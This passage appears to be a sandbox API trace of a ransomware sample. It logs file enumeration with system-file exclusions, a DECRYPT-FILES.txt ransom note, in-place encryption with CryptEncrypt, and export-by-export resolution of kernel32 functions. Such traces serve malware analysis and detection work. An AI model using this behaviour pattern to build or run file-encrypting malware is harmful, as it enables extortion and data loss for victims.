(lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.463] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.463] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.463] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.463] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.463] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.463] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.463] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\0a16c9.tmp" [0185.463] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.464] CloseHandle (hObject=0x0) returned 0 [0185.464] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.464] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedfd020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaedfd020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.464] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.464] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url.0xtLF", cAlternateFileName="IEADD-~1.0XT")) returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="DECRYPT-FILES.txt") returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="autorun.inf") returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="boot.ini") returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="desktop.ini") returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="ntuser.dat") returned -1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="iconcache.db") returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="bootsect.bak") returned 1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="ntuser.dat.log") returned -1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="thumbs.db") returned -1 [0185.464] lstrcmpiW (lpString1="IE Add-on site.url.0xtLF", lpString2="Bootfont.bin") returned 1 [0185.464] lstrlenW (lpString="IE Add-on site.url.0xtLF") returned 24 [0185.465] lstrcmpiW (lpString1="0xtLF", lpString2="lnk") returned -1 [0185.465] lstrcmpiW (lpString1="0xtLF", lpString2="exe") returned -1 [0185.465] lstrcmpiW (lpString1="0xtLF", lpString2="sys") returned -1 [0185.465] lstrcmpiW (lpString1="0xtLF", lpString2="dll") returned -1 [0185.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.465] lstrlenW (lpString="IE Add-on site.url.0xtLF") returned 24 [0185.465] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.465] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url.0xtLF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF" [0185.465] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.0xtlf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.465] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.465] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.465] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.466] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.466] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.466] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.466] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.466] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.467] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.467] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.467] CloseHandle (hObject=0x268) returned 1 [0185.467] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.467] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.468] CloseHandle (hObject=0x0) returned 0 [0185.468] CloseHandle (hObject=0x264) returned 1 [0185.468] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.469] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.469] GetTickCount () returned 0x11359b5 [0185.469] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.469] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.469] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.469] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.470] lstrlenA (lpString="kernel32.dll") returned 12 [0185.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.470] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.470] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.470] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.470] lstrlenA (lpString="ADDATOMA") returned 8 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.470] lstrlenA (lpString="ADDATOMW") returned 8 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.470] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.470] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.470] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.470] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.470] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.470] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.470] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.470] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.470] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.471] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.471] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.471] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.471] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.471] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.471] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.471] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.471] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.471] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.471] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.471] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.471] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.471] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.471] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.471] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.471] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.471] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.471] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.471] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.471] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.472] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.472] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.472] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.472] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.472] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.472] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.472] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.472] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.472] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.472] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.472] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.472] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.472] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.472] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.472] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.472] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.472] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.472] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.473] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.473] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.473] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.473] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.473] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.473] lstrlenA (lpString="BEEP") returned 4 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.473] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.473] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.473] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.473] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.473] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.473] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.473] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.473] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.473] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.473] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.473] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.473] lstrlenA (lpString="CANCELIO") returned 8 [0185.473] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.473] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.474] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.474] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.474] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.474] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.474] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.474] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.474] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.474] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.474] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.474] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.474] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" 